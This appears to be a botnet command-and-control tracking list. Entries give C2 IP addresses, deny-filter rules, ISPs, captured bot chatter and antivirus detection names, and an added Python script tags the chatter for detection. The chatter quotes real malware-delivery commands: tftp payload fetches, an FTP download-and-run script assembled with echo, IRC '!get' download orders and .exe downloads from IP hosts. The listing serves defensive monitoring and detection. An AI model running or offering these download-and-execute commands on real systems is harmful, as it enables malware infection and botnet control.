- Client: GET /x.exe HTTP/1.0User-Agent: Mozilla/4.0Host: 85.132.5.169:1737
- Client: NICK hxpxonzsUSER c020501 . . :-
- Client: JOIN &virtu
- Server: :i. PRIVMSG hxpxonzs :!get http:/dretis.cn/oc/box.txt
more.... |
BotClient Antivirus Diagnoses
| AhnLab-V3 | Virut.B |
| AntiVir | Virut.AX |
| Authentium | Korgo.W |
| Avast | _Virtob |
| AVG | Korgo.D |
| BitDefender | Generic.1674959 |
| CAT-QuickHeal | Virut.Z |
| ClamAV | MISSED |
| DrWeb | Lsabot |
| eSafe | Virut.n |
| eTrust-Vet | Virut.7115 |
| Ewido | MISSED |
| FileAdvisor | MISSED |
| Fortinet | Virut.AV |
| F-Prot | Korgo.W |
| F-Secure | Virut.av |
| Ikarus | Korgo.K |
| Kaspersky | Virut.av |
| McAfee | Virut.gen.a |
| Microsoft | Korgo.AB |
| NOD32v2 | MISSED |
| Norman | Korgo.Y |
| Panda | Virutas.FG |
| Prevx1 | MISSED |
| Rising | Junk.Virut.a |
| Sophos | Virut-W |
| Sunbelt | Generic!BT |
| Symantec | Virut.W |
| TheHacker | Virut.av |
| TrendMicro | PE_VIRUT.AV |
| VBA32 | Virut.2 |
| VirusBuster | Korgo.AB |
| Webwasher Gateway | MISSED |

Priority: 4
TCP Ports: 6900
Filter: deny ip host 81.12.88.44 any log ! 4 infects 11/20/09 to 11/20/09 -
ISP: farhang arya communications company
Clients: 4
Country: iran, islamic republic of
Domain: -
Activity:
Chatter Example
- Client: NICK Bisho911USER htiwa 0 0 :Bisho911
- Server: :fart.bitchassness.shit NOTICE Bisho911 :*** If you are having...
- Server: PONG :940FFB4F
- Client: JOIN ##!X4
- Client: USERHOST Bisho911MODE Bisho911 -x+iJOIN ##!X4 USERHOST...
- Server: :fart.bitchassness.shit NOTICE Bisho911 :Setting/removing of...
- Server: PONG :fart.bitchassness.shit
more.... |
BotClient Antivirus Diagnoses
| AhnLab-V3 | MISSED |
| AntiVir | MISSED |
| Authentium | MISSED |
| Avast | MISSED |
| AVG | MISSED |
| BitDefender | MISSED |
| CAT-QuickHeal | MISSED |
| ClamAV | MISSED |
| DrWeb | MISSED |
| eSafe | MISSED |
| eTrust-Vet | MISSED |
| Ewido | MISSED |
| FileAdvisor | MISSED |
| Fortinet | MISSED |
| F-Prot | MISSED |
| F-Secure | MISSED |
| Ikarus | MISSED |
| Kaspersky | MISSED |
| McAfee | MISSED |
| Microsoft | MISSED |
| NOD32v2 | MISSED |
| Norman | MISSED |
| Panda | MISSED |
| Prevx1 | MISSED |
| Rising | MISSED |
| Sophos | MISSED |
| Sunbelt | MISSED |
| Symantec | MISSED |
| TheHacker | MISSED |
| TrendMicro | MISSED |
| VBA32 | MISSED |
| VirusBuster | MISSED |
| Webwasher Gateway | MISSED |

Priority: 3
TCP Ports: 6668 6667
Filter: deny ip host 91.121.83.177 any log ! 3 infects 08/22/09 to 08/22/09 gergosnet.com
ISP: ovh sas
Clients: 3
Country: france
Domain: gergosnet.com
Activity:
Chatter Example
- Client: USER 1
- Server: 331 Password required
- Client: PASS 1
- Server: 230 User logged in.
- Server: RETR mode.exe
- Server: 150 Opening BINARY mode data connection
- Server: 221 Goodbye happy r00ting.
- Client: NICK gyreobciUSER cwbkcdugs 0 0 :gyreobci
- Server: :irc.priv8net.com NOTICE AUTH :*** Looking up your...
- Client: USERHOST gyreobci
- Client: MODE gyreobci +xiJOIN ##Stab## qifort1USERHOST gyreobciMODE...
- Server: PONG :irc.priv8net.com
- Client: JOIN ##Stab## qifort1
- Server: PONG :irc.priv8net.com
- Client: JOIN ##Stab## qifort1
- Server: PONG :irc.priv8net.com
- Client: JOIN ##Stab## qifort1
more.... |
BotClient Antivirus Diagnoses
| AhnLab-V3 | MISSED |
| AntiVir | MISSED |
| Authentium | MISSED |
| Avast | MISSED |
| AVG | MISSED |
| BitDefender | MISSED |
| CAT-QuickHeal | MISSED |
| ClamAV | MISSED |
| DrWeb | MISSED |
| eSafe | MISSED |
| eTrust-Vet | MISSED |
| Ewido | MISSED |
| FileAdvisor | MISSED |
| Fortinet | MISSED |
| F-Prot | MISSED |
| F-Secure | Suspicious_Malware!Gemini |
| Ikarus | MISSED |
| Kaspersky | MISSED |
| McAfee | MISSED |
| Microsoft | MISSED |
| NOD32v2 | MISSED |
| Norman | MISSED |
| Panda | MISSED |
| Prevx1 | MISSED |
| Rising | MISSED |
| Sophos | MISSED |
| Sunbelt | MISSED |
| Symantec | MISSED |
| TheHacker | MISSED |
| TrendMicro | MISSED |
| VBA32 | MISSED |
| VirusBuster | MISSED |
| Webwasher Gateway | MISSED |

Priority: 3
TCP Ports: 5190
67
Filter: deny ip host 83.68.16.6 any log ! 3 infects 08/23/09 to 09/19/09 xs4all.nl
ISP: xs4all internet bv
Clients: 3
Country: netherlands
Domain: xs4all.nl
Activity:
Chatter Example
- Client: USER qifonx qifonx qifonx :imeqgcebisvovxly
- Client: NICK znbXghHO
- Server: NOTICE AUTH :*** Looking up your hostname...NOTICE AUTH :***...
- Client: MODE znbXghHO +xi
- Client: JOIN #las6 USERHOST znbXghHO
- Server: :znbXghHO!qifonx@192.168.1.192 JOIN :#las6
- Client: MODE #las6 +smntu
- Server: :norks.org MODE #las6 +nt:norks.org 353 znbXghHO = #las6 :@wloos...
- Client: USER qifonx qifonx qifonx :imeqgcebisvovxly
- Server: NOTICE AUTH :*** Looking up your hostname...NOTICE AUTH :***...
- Server: NICK znbXghHO
- Client: USER qifonx qifonx qifonx :imeqgcebisvovxlyNICK znbXghHO
- Client: MODE znbXghHO +xi
- Client: JOIN #las6 USERHOST znbXghHO
- Server: :znbXghHO!qifonx@192.168.1.192 JOIN :#las6
- Client: MODE #las6 +smntu
- Server: :norks.org MODE #las6 +nt:norks.org 353 znbXghHO = #las6 :@wloos...
more.... |
BotClient Antivirus Diagnoses
| AhnLab-V3 | Win-Nepoe.58880 |
| AntiVir | TRCrypt.XPACK.Gen |
| Authentium | Nepoe.A |
| Avast | MISSED |
| AVG | SHeur2.AIJS |
| BitDefender | IRC-Generic.5049 |
| CAT-QuickHeal | Nepoe.hm |
| ClamAV | MISSED |
| DrWeb | Packed.162 |
| eSafe | TRCrypt.XPACK |
| eTrust-Vet | Linkbot.VJ |
| Ewido | MISSED |
| FileAdvisor | MISSED |
| Fortinet | Nepoe.YW!tr |
| F-Prot | Nepoe.A |
| F-Secure | Nepoe.hm |
| Ikarus | Packer.Krunchy.B |
| Kaspersky | Nepoe.hm |
| McAfee | MISSED |
| Microsoft | Poebot |
| NOD32v2 | MISSED |
| Norman | Smalltroj.dam |
| Panda | BckNepoe.F |
| Prevx1 | MISSED |
| Rising | Undef.dnb |
| Sophos | MalGeneric-A |
| Sunbelt | MISSED |
| Symantec | IRCBot |
| TheHacker | MISSED |
| TrendMicro | BKDR_NEPOE.CW |
| VBA32 | Nepoe.hm |
| VirusBuster | Nepoe.DL |
| Webwasher Gateway | MISSED |

Priority: 2
TCP Ports: 65520
216
Filter: deny ip host 221.5.74.40 any log ! 2 infects 08/18/09 to 08/18/09 cncnet.net
ISP: china unicom guangdong province network
Clients: 2
Country: china
Domain: cncnet.net
Activity:
Chatter Example
- Client: NICK tztznbvfUSER f020501 . . :-
- Server: NICK tztznbvfUSER f020501 . . :-JOIN &virtu
- Server: :j. PRIVMSG tztznbvf :!get http:/dretis.cn/oc/box.txt
- Client: GET /oc/box.txt HTTP/1.0User-Agent: DownloadHost:...
- Server: GET /op/lgate.php?n=94AEEEDFFCB64848 HTTP/1.0Accept:...
- Server: GET /bt5/fout.php HTTP/1.0Accept: */*User-Agent: Mozilla/4.0...
- Server: GET /lib/bot.txt HTTP/1.0Accept: */*User-Agent: Mozilla/4.0...
- Server: GET /lib/abb.txt HTTP/1.0Accept: */*User-Agent: Mozilla/4.0...
- Server: GET /ag/lo.txt HTTP/1.0Accept: */*User-Agent: Mozilla/4.0...
- Server: GET /dll/mal.txt HTTP/1.0Accept: */*User-Agent: Mozilla/4.0...
- Server: GET...
more.... |
BotClient Antivirus Diagnoses
| AhnLab-V3 | MISSED |
| AntiVir | MISSED |
| Authentium | MISSED |
| Avast | MISSED |
| AVG | MISSED |
| BitDefender | MISSED |
| CAT-QuickHeal | MISSED |
| ClamAV | MISSED |
| DrWeb | MISSED |
| eSafe | MISSED |
| eTrust-Vet | MISSED |
| Ewido | MISSED |
| FileAdvisor | MISSED |
| Fortinet | MISSED |
| F-Prot | MISSED |
| F-Secure | Suspicious_Malware!Gemini |
| Ikarus | Trojan-Downloader.Obitel |
| Kaspersky | MISSED |
| McAfee | MISSED |
| Microsoft | TrojanDownloader_Obitel.gen!C |
| NOD32v2 | MISSED |
| Norman | MISSED |
| Panda | MISSED |
| Prevx1 | MISSED |
| Rising | MISSED |
| Sophos | MISSED |
| Sunbelt | MISSED |
| Symantec | MISSED |
| TheHacker | MISSED |
| TrendMicro | MISSED |
| VBA32 | MISSED |
| VirusBuster | MISSED |
| Webwasher Gateway | MISSED |

Priority: 2
TCP Ports: 13001 12351
Filter: deny ip host 122.160.232.194 any log ! 2 infects 09/13/09 to 10/30/09 122.airtelbroadband.in
ISP: abts-dsl-del
Clients: 2
Country: india
Domain: 122.airtelbroadband.in
Activity:
Chatter Example
- Client: echo open 85.179.166.148 17323>.pif C:\WINDOWS\system32>
- Client: echo user a a>>.pif C:\WINDOWS\system32>
- Client: echo binary>>.pif C:\WINDOWS\system32>
- Client: echo GET iexplorer.exe>>.pif C:\WINDOWS\system32>
- Client: echo bye>>.pif C:\WINDOWS\system32>
- Client: echo @echo off >c.batC:\WINDOWS\system32>
- Client: echo ftp -n -v -s:.pif >>c.batC:\WINDOWS\system32>
- Client: echo iexplorer.exe >>c.batC:\WINDOWS\system32>
- Client: echo del .pif >>c.batC:\WINDOWS\system32>
- Client: echo del /F c.bat >>c.batC:\WINDOWS\system32>
- Client: echo exit /y >>c.batC:\WINDOWS\system32>
- Client: USER a
- Client: PASS a
- Server: RETR iexplorer.exe
- Client: NICK `tkhjqhirUSER `tkhjqhir 0 0 :`tkhjqhir
- Server: :irc.priv8net.com NOTICE AUTH :*** Looking up your hostname...
- Client: JOIN #.has hs
- Client: USERHOST `tkhjqhirJOIN #.has hsUSERHOST `tkhjqhirJOIN #.has...
- Server: :`tkhjqhir!~tkhjqhir@183C7886.415835BD.ED5D58B5.IP JOIN...
- Server: PONG :irc.priv8net.com
- Client: JOIN #.has hs
- Server: PONG :irc.priv8net.com
- Client: JOIN #.has hs
- Server: PONG :irc.priv8net.com
- Client: JOIN #.has hs
- Server: PONG :irc.priv8net.com
- Client: JOIN #.has hs
- Server: PONG :irc.priv8net.com
- Client: JOIN #.has hs
- Server: PONG :irc.priv8net.com
- Client: JOIN #.has hs
- Server: PONG :irc.priv8net.com
- Client: JOIN #.has hs
- Server: PONG :irc.priv8net.com
- Client: JOIN #.has hs
more.... |
BotClient Antivirus Diagnoses
| AhnLab-V3 | MISSED |
| AntiVir | TRSpy.Games.A |
| Authentium | STZ_like!Generic |
| Avast | MISSED |
| AVG | PolyCrypt |
| BitDefender | MISSED |
| CAT-QuickHeal | MISSED |
| ClamAV | MISSED |
| DrWeb | MISSED |
| eSafe | MISSED |
| eTrust-Vet | MISSED |
| Ewido | MISSED |
| FileAdvisor | MISSED |
| Fortinet | MISSED |
| F-Prot | STZ_like!Generic |
| F-Secure | Suspicious_Malware!Gemini |
| Ikarus | Virut.n |
| Kaspersky | MISSED |
| McAfee | MISSED |
| Microsoft | MISSED |
| NOD32v2 | MISSED |
| Norman | MISSED |
| Panda | MISSED |
| Prevx1 | MISSED |
| Rising | MISSED |
| Sophos | MISSED |
| Sunbelt | MISSED |
| Symantec | MISSED |
| TheHacker | MISSED |
| TrendMicro | MISSED |
| VBA32 | MISSED |
| VirusBuster | MISSED |
| Webwasher Gateway | Spy.Games.A |

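The chatter on this page repeats a handful of patterns: a dir dllcache\tftpd.exe probe followed by tftp -i <ip> get svchost.exe / dllhost.exe (several entries above), the &virtu IRC join answered by a !get http:/... command, the PASS secretpass / NICK P|... handshake with a country|OS tag, an .exe fetched from an IP-literal Host, the MODE #channel +smntu lockdown, and, in the entry just above, an FTP download script assembled line by line with echo and executed with ftp -n -v -s:. What follows is an added example, not the list's own tooling: a small rule set that tags each captured line with the technique it shows and pulls out the secondary indicators (the tftp/ftp server address, the fetched file, the !get URL, the IP-literal Host). The sample lines are copied from entries on this page; the two benign lines and all rule names are constructed and assumed.

```python
"""Tag captured bot chatter lines and extract secondary indicators.

Added example; not the list's own tooling.  SAMPLE_CHATTER quotes lines from
entries on this page (with the page's "- Client:"/"- Server:" prefixes); the
last two lines are constructed benign traffic.  Rule names are my labels.
"""
import re

SAMPLE_CHATTER = [
    "- Client: dir dllcache\\tftpd.exe",
    "- Client: tftp -i 70.184.248.143 get svchost.exe wins\\SVCHOST.EXE",
    "- Client: NICK ynqsvhnjUSER r020500 . . :-",
    "- Client: JOIN &virtu",
    "- Server: :u. PRIVMSG ynqsvhnj :!get http:/www.liagand.cn/img/unpr.gif:u...",
    "- Client: PASS secretpass",
    "- Client: NICK P|tyz4nprpcUSER v7sfuv623 * 0 :USA|XP|126",
    "- Client: echo open 85.179.166.148 17323>.pif C:\\WINDOWS\\system32>",
    "- Client: echo ftp -n -v -s:.pif >>c.batC:\\WINDOWS\\system32>",
    "- Client: GET /x.exe HTTP/1.0User-Agent: Mozilla/4.0Host: 85.132.5.169:1737",
    "- Client: JOIN #las6 USERHOST RODhbJxTMODE #m +smntuPRIVMSG #m...",
    "- Client: GET /index.html HTTP/1.1Host: www.example.com",  # constructed, benign
    "- Client: NICK alice",                                       # constructed, benign
]

IPV4 = r"\d{1,3}(?:\.\d{1,3}){3}"

# (tag, pattern).  Named groups become extracted indicators.  The page's capture
# strips line breaks, so commands can run together ("...RODhbJxTMODE #m"); the
# patterns therefore avoid leading \b anchors where that happens.
RULES = [
    ("tftpd_probe", re.compile(r"\bdir\s+dllcache\\tftpd\.exe", re.I)),
    ("tftp_payload_fetch", re.compile(rf"\btftp\s+-i\s+(?P<ip>{IPV4})\s+get\s+(?P<file>\S+)", re.I)),
    ("ftp_script_via_echo", re.compile(rf"\becho\s+(?:open\s+(?P<ip>{IPV4})\s+\d+|ftp\s+-n\s+-v\s+-s:)", re.I)),
    ("irc_user_numeric_ident", re.compile(r"USER\s+[a-z]\d{6}\s+\.\s+\.\s+:[-_]")),
    ("irc_join_virtu", re.compile(r"JOIN\s+&virtu\b")),
    ("irc_get_command", re.compile(r"PRIVMSG\s+\S+\s+:!get\s+(?P<url>http:/+\S+)")),
    ("irc_hardcoded_pass", re.compile(r"^PASS\s+secretpass$")),
    ("irc_geo_os_nick", re.compile(r"NICK\s+P\|\S+?USER\s+\S+\s+\*\s+0\s+:[A-Z]{2,3}\|XP\|\d+")),
    ("irc_channel_lockdown", re.compile(r"MODE\s+#\S+\s+\+smntu")),
    ("http_exe_by_ip_literal", re.compile(rf"GET\s+/\S+\.exe\s+HTTP/1\.[01].*Host:\s*(?P<host>{IPV4}(?::\d+)?)")),
]

LINE_RE = re.compile(r"^-\s*(?P<side>Client|Server):\s*(?P<msg>.*)$")


def classify(line):
    """Return (side, [matching tags], {indicator: value}) for one chatter line.
    Lines not in the page's "- Client:"/"- Server:" form give (None, [], {})."""
    m = LINE_RE.match(line)
    if not m:
        return None, [], {}
    msg = m.group("msg")
    tags, iocs = [], {}
    for tag, rx in RULES:
        hit = rx.search(msg)
        if hit:
            tags.append(tag)
            iocs.update({k: v for k, v in hit.groupdict().items() if v})
    return m.group("side"), tags, iocs


def summarize(lines):
    """Aggregate a whole session: the set of tags seen and indicators by kind."""
    tags, iocs = set(), {}
    for line in lines:
        _, hits, found = classify(line)
        tags.update(hits)
        for kind, value in found.items():
            iocs.setdefault(kind, set()).add(value)
    return tags, iocs


if __name__ == "__main__":
    seen, indicators = summarize(SAMPLE_CHATTER)
    print(sorted(seen))
    for kind in sorted(indicators):
        print(kind, sorted(indicators[kind]))
```

Two points worth keeping in mind when turning this into live detection. The page's capture has its CRLFs stripped, so several IRC commands appear fused on one line; a sensor sees them as separate messages, and rules should be anchored per message rather than per captured line. Also, the address in the tftp or echo-built ftp fetch is the machine that delivered the payload, and it differs from the filter IP in every entry on this page, so it belongs in an infected-host report rather than in the C2 block list.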
Priority: 2
TCP Ports: 80
Filter: deny ip host 68.178.232.100 any log ! 2 infects 12/13/09 to 01/22/10 secureserver.net
ISP: godaddy.com inc
Clients: 2
Country: united states
Domain: secureserver.net
Activity:
Chatter Example
- Server: GET / HTTP/1.1Accept: */*Accept-Language: en-usAccept-Encoding:...
- Server: GET /?245e7ff8 HTTP/1.1Accept: */*Accept-Language:...
- Server: GET / HTTP/1.1Accept: */*Accept-Language: en-usAccept-Encoding:...
- Server: GET /sd?s=95308&f=1 HTTP/1.1Accept: */*Referer:...
- Server: GET /sd?s=95308&f=1&C=1 HTTP/1.1Accept: */*Referer:...
- Server: GET /apps/domainpark/show_afd_ads.js HTTP/1.1Accept: */*Referer:...
- Server: GET /images/hdr_parked_ppc_4.png HTTP/1.1Accept: */*Referer:...
- Server: GET /images/hdr_parked_ppc_4.png?245e7ff8 HTTP/1.1Accept:...
- Server: GET /images/061703/spc_trans.gif HTTP/1.1Accept: */*Referer:...
- Server: GET /images/hdr_parked_ppc_4.png HTTP/1.1Accept: */*Referer:...
- Server: GET /images/img_gdlogo.png HTTP/1.1Accept: */*Referer:...
- Server: GET /images/mrkt_250x80_4.gif HTTP/1.1Accept: */*Referer:...
- Server: GET /images/tp250x80_7.gif HTTP/1.1Accept: */*Referer:...
- Server: GET /images/img_saletag.gif HTTP/1.1Accept: */*Referer:...
- Server: GET /images/img_parkedfreetext_b.png HTTP/1.1Accept: */*Referer:...
- Server: GET /images/but_search.png HTTP/1.1Accept: */*Referer:...
- Server: GET /images/tp468x60_7.gif HTTP/1.1Accept: */*Referer:...
- Server: GET /images/ad_ppc_prodadv.gif HTTP/1.1Accept: */*Referer:...
- Server: GET /images/ban_199_3.gif HTTP/1.1Accept: */*Referer:...
- Server: GET /images/061703/but_go_orange_green.gif HTTP/1.1Accept:...
- Server: GET /images/img_orangearrows.png HTTP/1.1Accept: */*Referer:...
- Server: GET /images/dbs_2.gif HTTP/1.1Accept: */*Referer:...
- Server: GET /images/log_me.gif HTTP/1.1Accept: */*Referer:...
- Server: GET /images/ad_ppc_hosting.gif HTTP/1.1Accept: */*Referer:...
- Server: GET /images/ad_ppc_biz3.gif HTTP/1.1Accept: */*Referer:...
- Server: GET /images/log_icann.png HTTP/1.1Accept: */*Referer:...
- Server: GET / HTTP/1.1Accept: */*Referer:...
- Server: GET /images/img_footertext2.png HTTP/1.1Accept: */*Referer:...
- Server: GET /images/bul_blacksquare.png HTTP/1.1Accept: */*Referer:...
- Server: GET /images/bul_bluesquare.png HTTP/1.1Accept: */*Referer:...
- Server: GET /images/ad_ppc_wst.gif HTTP/1.1Accept: */*Referer:...
- Server: GET /images/ad_ppc_gdauctions.gif HTTP/1.1Accept: */*Referer:...
- Server: GET /assets/spc_trans.gif HTTP/1.1Accept: */*Referer:...
- Server: GET /aaa/help/hlp_toplft.gif HTTP/1.1Accept: */*Referer:...
- Server: GET /aaa/help/hlp_toprt.gif HTTP/1.1Accept: */*Referer:...
- Server: GET /aaa/help/hlp_botlft.gif HTTP/1.1Accept: */*Referer:...
- Server: GET /aaa/help/hlp_botrt.gif HTTP/1.1Accept: */*Referer:...
more.... |
BotClient Antivirus Diagnoses
| AhnLab-V3 | MISSED |
| AntiVir | MISSED |
| Authentium | MISSED |
| Avast | MISSED |
| AVG | MISSED |
| BitDefender | MISSED |
| CAT-QuickHeal | MISSED |
| ClamAV | MISSED |
| DrWeb | MISSED |
| eSafe | MISSED |
| eTrust-Vet | MISSED |
| Ewido | MISSED |
| FileAdvisor | MISSED |
| Fortinet | MISSED |
| F-Prot | MISSED |
| F-Secure | MISSED |
| Ikarus | MISSED |
| Kaspersky | MISSED |
| McAfee | MISSED |
| Microsoft | MISSED |
| NOD32v2 | MISSED |
| Norman | MISSED |
| Panda | MISSED |
| Prevx1 | MISSED |
| Rising | MISSED |
| Sophos | MISSED |
| Sunbelt | MISSED |
| Symantec | MISSED |
| TheHacker | MISSED |
| TrendMicro | MISSED |
| VBA32 | MISSED |
| VirusBuster | MISSED |
| Webwasher Gateway | MISSED |

Priority: 2
TCP Ports: 3305
Filter: deny ip host 89.208.33.88 any log ! 2 infects 11/15/09 to 11/18/09 di-net.ru
ISP: hosting and colocation services
Clients: 2
Country: russian federation
Domain: di-net.ru
Activity:
Chatter Example
- Client: dir dllcache\tftpd.exe
- Client: tftp -i 67.55.178.248 get svchost.exe wins\SVCHOST.EXE
- Client: tftp -i 67.55.178.248 get dllhost.exe wins\DLLHOST.EXE
- Client: PASS secretpass
- Client: NICK P|i5vvaj0awUSER mlj7x67ke * 0 :USA|XP|867
- Server: :hub.14020.net 001 P|i5vvaj0aw...
- Client: USERHOST P|i5vvaj0aw
- Server: :hub.14020.net 302 P|i5vvaj0aw...
- Client: USERHOST P|i5vvaj0awMODE P|i5vvaj0aw JOIN #mm RSA
- Client: PRIVMSG #mm...
more.... |
BotClient Antivirus Diagnoses
| AhnLab-V3 | Virut.B |
| AntiVir | Virut.AX |
| Authentium | Virut.7116 |
| Avast | _Virtob |
| AVG | Virut |
| BitDefender | Virtob.8.Gen |
| CAT-QuickHeal | Virut.Z |
| ClamAV | Virut-54 |
| DrWeb | HLLW.Piabot.4 |
| eSafe | MISSED |
| eTrust-Vet | Virut.7115 |
| Ewido | MISSED |
| FileAdvisor | MISSED |
| Fortinet | Virut.AV |
| F-Prot | Virut.7116 |
| F-Secure | Virtob.8.Gen |
| Ikarus | Kolabc |
| Kaspersky | Virut.av |
| McAfee | Virut.gen.a |
| Microsoft | Virut.AC |
| NOD32v2 | MISSED |
| Norman | Virut.AG |
| Panda | Virutas.FG |
| Prevx1 | MISSED |
| Rising | Virut.an |
| Sophos | Virut-W |
| Sunbelt | MISSED |
| Symantec | Virut.W |
| TheHacker | Virut.av |
| TrendMicro | PE_VIRUT.AV |
| VBA32 | Virut.2 |
| VirusBuster | Virut.Gen.4 |
| Webwasher Gateway | MISSED |

Priority: 2
TCP Ports: 2569 3938
Filter: deny ip host 89.149.227.51 any log ! 2 infects 10/16/09 to 10/17/09 internetserviceteam.com
ISP: netdirekt e.k
Clients: 2
Country: germany
Domain: internetserviceteam.com
Activity:
Chatter Example
- Client: dir dllcache\tftpd.exe
- Client: tftp -i 113.253.112.208 get svchost.exe wins\SVCHOST.EXE
- Client: tftp -i 113.253.112.208 get dllhost.exe wins\DLLHOST.EXE
- Client: USER smpbcb smpbcb smpbcb :gywmthsyspraopyh
- Client: NICK tiHIjEan
- Server: :irc.foonet.com NOTICE AUTH :*** Looking up your hostname...
- Server: :irc.foonet.com NOTICE AUTH :*** Couldn't resolve your...
- Client: MODE tiHIjEan +xi
- Server: File is missing:tiHIjEan MODE tiHIjEan :+iwx
- Client: JOIN ##russia## USERHOST tiHIjEan
- Client: MODE ##russia## +smntu
- Client: GET /dive.exe HTTP/1.0Host: 89.149.227.51
more.... |
BotClient Antivirus Diagnoses
| AhnLab-V3 | MISSED |
| AntiVir | Palevo.jur.20 |
| Authentium | MISSED |
| Avast | _Trojan-gen |
| AVG | Dropper.Generic.AYVO |
| BitDefender | Generic.2518038 |
| CAT-QuickHeal | Agent.ATV |
| ClamAV | MISSED |
| DrWeb | IRC.Sdbot.5190 |
| eSafe | TrojanProxyRan |
| eTrust-Vet | MISSED |
| Ewido | MISSED |
| FileAdvisor | MISSED |
| Fortinet | PossibleThreat |
| F-Prot | MISSED |
| F-Secure | MISSED |
| Ikarus | Pushbot |
| Kaspersky | P2P-Palevo.jur |
| McAfee | Autorun.aah |
| Microsoft | Malagent |
| NOD32v2 | MISSED |
| Norman | MISSED |
| Panda | MISSED |
| Prevx1 | MISSED |
| Rising | MISSED |
| Sophos | MalGeneric-A |
| Sunbelt | MISSED |
| Symantec | IRCBot |
| TheHacker | MISSED |
| TrendMicro | TROJ_AGENT.ICZZ |
| VBA32 | Kolab.ear |
| VirusBuster | P2P.Palevo.EAN |
| Webwasher Gateway | MISSED |

| Priority | 1 |
| TCP Ports | 18067 |
| Filter | deny ip host 204.45.13.42 any log ! 1 infects 01/06/10 to 01/06/10 - |
| ISP | - |
| Clients | 1 |
| Country | - |
| Domain | - |

Activity: Chatter Example
- Client: USeR l l l l
- Client: NiCK l5-00029f63
- Client: PoNG :8BC55D68
- Server: :a 001 l5-00029f63 :l5-00029f63 MODE l5-00029f63 :+i
- Client: USeRHOST l5-00029f63
- Client: JOiN #l5t3 dlrowymx0ri
- Server: :l5-00029f63!l@192.168.1.160 JOIN :#l5t3
BotClient Antivirus Diagnoses
| AhnLab-V3 | Win-Small.6694 |
| AntiVir | BDSSmall.EO |
| Authentium | BAE |
| Avast | _Trojano-1124 |
| AVG | Small.27.AQ |
| BitDefender | Generic.24785 |
| CAT-QuickHeal | Small.eo |
| ClamAV | SdBot-730 |
| DrWeb | Restrict |
| eSafe | Stration |
| eTrust-Vet | Cuebot.E |
| Ewido | MISSED |
| FileAdvisor | MISSED |
| Fortinet | RPC.WALLZ!worm |
| F-Prot | BAE |
| F-Secure | Small.eo |
| Ikarus | IM-Opanki.O |
| Kaspersky | Small.eo |
| McAfee | Sdbot.gen |
| Microsoft | Small.BX |
| NOD32v2 | MISSED |
| Norman | Suspicious_M.gen |
| Panda | BckSmall.HI |
| Prevx1 | MISSED |
| Rising | Mocbot.a |
| Sophos | Hwbot-A |
| Sunbelt | MISSED |
| Symantec | Trojan |
| TheHacker | BackdoorSmall.eo |
| TrendMicro | BKDR_SDBOT.GAA |
| VBA32 | Small.eo |
| VirusBuster | Small.AEE |
| Webwasher Gateway | MISSED |

| Priority | 1 |
| TCP Ports | 6667 |
| Filter | deny ip host 38.97.225.135 any log ! 1 infects 10/29/09 to 10/29/09 cogentco.com |
| ISP | psinet inc |
| Clients | 1 |
| Country | united states |
| Domain | cogentco.com |

Activity: Chatter Example
- Client: GET /x.exe HTTP/1.0User-Agent: Mozilla/4.0Host: 213.16.201.41:7314
- Server: GET /x.exe HTTP/1.0User-Agent: Mozilla/4.0Host: 213.16.201.41:7314
BotClient Antivirus Diagnoses
| AhnLab-V3 | Parite |
| AntiVir | Parite |
| Authentium | Korgo.V |
| Avast | _Parite |
| AVG | Korgo.A |
| BitDefender | Padobot.BV.Dam |
| CAT-QuickHeal | Perite.B |
| ClamAV | Padobot.M |
| DrWeb | Lsabot |
| eSafe | _Parite_B |
| eTrust-Vet | Pinfi.A |
| Ewido | MISSED |
| FileAdvisor | MISSED |
| Fortinet | Parite.B |
| F-Prot | Korgo.V |
| F-Secure | Padobot.BV.Dam |
| Ikarus | Padobot.M |
| Kaspersky | Padobot.m |
| McAfee | Pate.b |
| Microsoft | Korgo.V |
| NOD32v2 | MISSED |
| Norman | Korgo.V |
| Panda | Korgo.U.worm |
| Prevx1 | MISSED |
| Rising | Parite.b |
| Sophos | Parite-B |
| Sunbelt | MISSED |
| Symantec | Pinfi |
| TheHacker | Pate.B |
| TrendMicro | PE_PARITE.A |
| VBA32 | Parite.B |
| VirusBuster | Padobot.D |
| Webwasher Gateway | MISSED |

| Priority | 1 |
| TCP Ports | 16667 |
| Filter | deny ip host 92.243.19.221 any log ! 1 infects 01/18/10 to 01/18/10 ghst.net |
| ISP | gandi dedicated hosting servers |
| Clients | 1 |
| Country | france |
| Domain | ghst.net |

Activity: Chatter Example
- Client: NICK [USA]XP-SP0[00]1198USER glplur 0 0...
- Server: :MBoY.Org NOTICE AUTH :*** Looking up your hostname...
- Server: :MBoY.Org NOTICE AUTH :*** Couldn't resolve your hostname;...
- Server: Org 422 [USA]XP-SP0[00]1198 :MOTD File is...
- Client: USERHOST [USA]XP-SP0[00]1198
- Client: MODE [USA]XP-SP0[00]1198 -x+iJOIN #l# lamUSERHOST...
- Server: PONG :MBoY.Org
- Server: :|!X@admin.com PRIVMSG #l# :.l lam -s
- Server: :|!X@admin.com PRIVMSG #l# :.l lam -s
- Server: :|!X@admin.com PRIVMSG #l# :.g3t...
- Client: GET /rshadel/mxx.exe HTTP/1.0User-Agent: Mozilla/4.0...
- Server: GET /rshadel/mxx.exe HTTP/1.0User-Agent: Mozilla/4.0...
- Server: :|!X@admin.com PRIVMSG #l# :.g3t...
- Server: GET /error/404.phtml HTTP/1.0User-Agent: Mozilla/4.0...
- Server: + \google-analytics.com/ga.js'...
- Server: :|!X@admin.com PRIVMSG #l# :.g3t...
- Server: GET /g0th1c/mxx.exe HTTP/1.0User-Agent: Mozilla/4.0...
- Server: GET /g0th1c/mxx.exe HTTP/1.0User-Agent: Mozilla/4.0...
- Server: GET /g0th1c/mxx.exe HTTP/1.0User-Agent: Mozilla/4.0...
- Server: GET /g0th1c/mxx.exe HTTP/1.0User-Agent: Mozilla/4.0...
- Server: GET /g0th1c/mxx.exe HTTP/1.0User-Agent: Mozilla/4.0...
- Server: GET /g0th1c/mxx.exe HTTP/1.0User-Agent: Mozilla/4.0...
- Server: :|!X@admin.com PRIVMSG #l# :.g3t...
- Server: :MBoY.Org 404 [USA]XP-SP0[00]1198 #l# :You must have a registered...
- Server: :MBoY.Org 404 [USA]XP-SP0[00]1198 #l# :You must have a registered...
- Server: :MBoY.Org 404 [USA]XP-SP0[00]1198 #l# :You must have a registered...
- Server: :MBoY.Org 404 [USA]XP-SP0[00]1198 #l# :You must have a registered...
- Server: :MBoY.Org 404 [USA]XP-SP0[00]1198 #l# :You must have a registered...
- Server: :MBoY.Org 404 [USA]XP-SP0[00]1198 #l# :You must have a registered...
